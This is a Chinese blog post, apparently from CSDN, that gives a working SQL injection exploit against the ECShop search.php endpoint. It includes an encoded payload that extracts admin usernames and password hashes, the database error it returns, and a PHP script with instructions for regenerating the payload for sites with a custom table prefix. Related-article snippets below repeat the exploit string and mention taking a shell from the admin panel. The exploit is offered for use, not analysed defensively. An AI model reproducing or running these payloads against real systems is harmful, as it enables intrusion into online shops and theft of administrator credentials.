ECSHOP 搜索变种注射自定义表名猜解方法

最新推荐文章于 2025-04-05 21:32:52 发布
最新推荐文章于 2025-04-05 21:32:52 发布
阅读量537 收藏
点赞数
分类专栏: 漏洞收集 文章标签: user mysql report 数据库 query server
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/god_7z1/article/details/6595537
版权
search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319 

返回:
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT goods_id, COUNT(*) AS num FROM `ma526073ww`.`73ww_goods_attr` WHERE 0 OR (1 AND attr_id = '1') and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'"\') union select 1#"'),1 from ecs_admin_user#' AND attr_value LIKE '%1%' ) GROUP BY goods_id HAVING num = '1' ) [2] => Array ( [error] => Table 'ma526073ww.ecs_admin_user' doesn't exist ) [3] => Array ( [errno] => 1146 ) )

原因是数据库前缀修改的问题。

解决办法:重新生成EXP变种文件。

用下面的代码生成一个code

 <?php
$p="ecs_";
$p=isset($_REQUEST['pre'])?$_REQUEST['pre']:$p;
$arr=array("1') and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'\"\\') union select 1#\"'),1 from ".$p."admin_user#"=>"1"); 
$exp = array("attr"=>$arr); 
$exp = base64_encode(serialize($exp)); 
//echo $exp;
?>
<textarea name="textarea" id="textarea" cols="100" rows="5"><?=$exp?></textarea>

以上代码保存为x.php,

73ww_为表前缀。

通过http://www.xxx.net/x.php?pre=73ww_访问,生成新的BASE64加密文件。

ECSHOP商品详情页 增加自定义TITLE的方法
02-12
在本文中,我们将详细探讨如何在ECSHOP电商平台的商品...这样,所有步骤完成后,ECSHOP的商品详情页就能够显示自定义的TITLE,从而更好地展示商品信息,提高搜索引擎的可见性,同时也满足了商家对页面定制的需求。
ecshop SQL注入通杀漏洞以及后台拿SHELL
11-25 8514
ecshop SQL注入通杀漏洞以及后台拿SHELL 文章来源:小灰博客|时间:2013-12-10 16:09:59|作者:Leo |2 条评论 文章分类:安全技术    标签: 安全教程 发现本地有家商城太自大了,真是目中无人啊…果断拿下给个警告,下面记载下这个Ecshop通杀漏洞吧! 先用下面的代码看下表的前缀(运气好下面的代码就把账号密码注射出来了) search.ph
ECSHOP 搜索变种暴用户密码出错的解决办法
收集盒 Book box
08-14 625
遇到一个ECSHOP 利用网上的EXP search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWx
Ecshop 漏洞集合
收集盒 Book box
03-31 3242
Ecshop 漏洞集合一、EXP:search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWx
ECSHOP 搜索注入漏洞利用exp及后台拿shell
weixin_33906657的博客
01-21 296
这个是search.php exp 变种 search.php? encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXC...
ECSHOP搜索产品url网址search.php地址很长处理方法
lcw2007101的专栏
04-23 2065
ecshop,在搜索产品时候出现的地址很长,比如 search.php? encode = YTo0OntzOjg6ImNhdGVnb3J5 IjtzOjE6IjAiO3M6ODoia2V5d29yZHMiO3M6MToiZCI7czoxMDoiaW1hZ2VGaWVsZCI7czowOiIiO3M6MTg6InNlYXJjaF9lbmNvZGVfdGltZ 代码后缀直  大家使用ec
ecshop 批量上传(加入自定义属性)
01-20
下面是实现批量上传(加入自定义属性)思路以及实现的过程。 1.加入属性 之所以只能上传特定的属性,应该是批量上传的固定属性都来自于一张表。esc_goods表. 所以我们想假如自己的属性,必须要在esc_goods中加入自己...
ECSHOP虚拟销量插件 自定义销量插件完整版
11-13
ecshop虚拟显示方式是采用自定义数量+真实实际的销量数量=累计销量显示在每个商品的详细页面上,同时会自动根据购买实际真实销量自动累计向上增加,从而达到完美最好的效果。 真实显示方式是直接显示实际真实的销量...
ecshop小京东,自定义kindeditor多图上传插件
05-17
标题 "ecshop小京东,自定义kindeditor多图上传插件" 涉及到的是在电商网站开发中,如何解决富文本编辑器在多图上传功能上的问题。ECSHOP小京东是一个基于ECSHOP开源电商系统的二次开发版本,它提供了类似京东的购物...
ECSHOP全站URL自定义插件,支持目录形式
12-20
ECSHOP中,URL自定义是一个重要的优化策略,能够提高网站的SEO(搜索引擎优化)效果,提升用户体验,并且使网站更加规范。"ECSHOP全站URL自定义插件,支持目录形式"正是为了实现这一目标而设计的。 首先,理解URL...
ecshop常见漏洞
free_xiaochen的博客
10-13 6836
ECSHOP 常见注入漏洞分析和修复方法     优易软件为大家整理 一些ecshop 常见注入漏洞分析和修复方法,在对ecshop使用操作上能够得到一些便利。 1.测试版本 v2.7.3 RELEASE 20121106(最新) v2.7.3 RELEASE 20120411 2.漏洞条件 需登录到后台
SQL、mySQL与SQLite简单理解
luluoluoa的博客
04-01 387
4、SQLite是一种轻量级别的数据库,不需要配置,下载SQLite(sqlite-tools-win-x64-3490100)之后解压,里边有一个sqlite3.exe,双击就可以打开命令行模式进行数据库创建和修改,输入.open test.db语句,就创建了一个数据库文件test.db,注意SQLite创建的数据库文件是.db文件。2、mySQL与SQLite是两种数据库管理系统,也可以理解为都使用SQL语言的数据库,可以创建管理数据库,其中SQLite是一种轻量级别的数据库
Mysql 数据库编程技术01
baobao1767640830的博客
04-05 527
支持各种平台,常搭配Linux。组成的LAMP(Linux-Apache-MySQL-PHP)网站架构是目前国际流行的网站架构方案。
MySQL联合查询
2302_79462679的博客
04-01 520
用于横向扩展数据,通过关联条件整合多表信息,核心掌握内连接与外连接的区别。:以左表为主,返回左表所有记录及右表的匹配记录(无匹配则右表字段为。:以右表为主,返回右表所有记录及左表的匹配记录(无匹配则左表字段为。通过明确需求、优化查询条件和合理使用索引,可显著提升联合查询效率。使用表别名提高可读性(如。通过关联条件横向合并多表数据,扩展查询结果的列信息。纵向合并多个查询结果,要求列数和数据类型一致。条件,否则会返回两表所有行的组合(如。结果集中不包含任一表的未匹配记录。:返回左右表所有记录,无匹配时填充。
SQLyog一款被遗忘的MySQL管理利器深度解析
心灵的专栏
04-01 208
Webyog(现属 Idera / AquaFold 公司)。是一个较老版本的 MySQL 图形化管理工具(32位版本)。(32位,兼容 32/64 位 Windows 系统)。32位(x86)版本可运行在 64位 系统上。:支持 CSV、Excel、XML 等格式。:11.2.4(较旧版本,新版本已更新)。:MySQL 图形化客户端(GUI)。:跨服务器同步数据库结构或数据。:安全连接远程 MySQL。:管理数据库、表、视图等。:自动化备份或脚本执行。)查找,但需注意安全性。:语法高亮、自动补全。
SpringBoot中application.yml--不同版本的Mysql,不同的url
A2715045459的博客
04-02 438
不同版本的 MySQL 驱动与数据库版本之间存在兼容性问题。例如,使用 MySQL 8.x 的驱动连接 MySQL 5.x 数据库可能会报错,反之亦然。所以要根据实际使用的 MySQL 数据库版本选择合适的驱动版本和配置哦~这些参数的添加主要是为了解决 MySQL 8.x 中引入的一些新特性,例如默认启用 SSL 连接以及对时区的严格要求。这是 MySQL 8.x 的官方推荐驱动类,它提供了更好的性能和对新特性的支持。:MySQL 8.x 对时区的处理更加严格,需要明确指定时区,例如。
在线sql 转 rust 模型(Diesel、SeaORM),支持多数据 mysql, pg等
A__tao的博客
04-02 366
在 Rust 语言中,常用 Diesel 和 SeaORM 进行数据库操作。手写 ORM 模型繁琐,提供工具,自动生成 Rust 代码,提高开发效率。
详解 MySQL InnoDB 引擎中的聚簇索引和非聚簇索的区别
Weiki的博客
04-02 931
聚簇索引:数据按照索引顺序存储在磁盘上,只有一个,通常是主键索引。非聚簇索引:索引结构独立于数据存储,包含指向数据的指针,可以有多个。
MySQL篇(五)MySQL主从同步原理深度剖析
最新发布
Chenchen0905_的博客
04-05 897
MySQL主从同步原理是一个复杂而又精妙的机制,它通过主库记录操作、从库获取并重放操作的流程,借助二进制日志、中继日志以及I/O线程、SQL线程等组件的协同工作,实现了主从库之间的数据同步。了解不同的复制模式以及常见问题的解决思路,对于构建稳定、高效的MySQL主从架构至关重要。随着数据库技术的不断发展,MySQL主从同步也在不断演进和优化,数据库管理员需要持续关注和学习,以更好地应用这一技术来满足业务对数据存储和处理的需求。希望通过本文的介绍,读者能够对MySQL主从同步原理有一个全面而深入的理解。
ECSHOP自定义虚拟销量实现方法
标题所描述的知识点是关于ECSHOP(一种开源的电子商务平台)的虚拟销量功能的自定义配置。ECSHOP是一个基于PHP和MySQL的系统,广泛用于搭建在线商店。在这个系统中,可以对商品的销量信息进行设置,使其显示为自定义...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值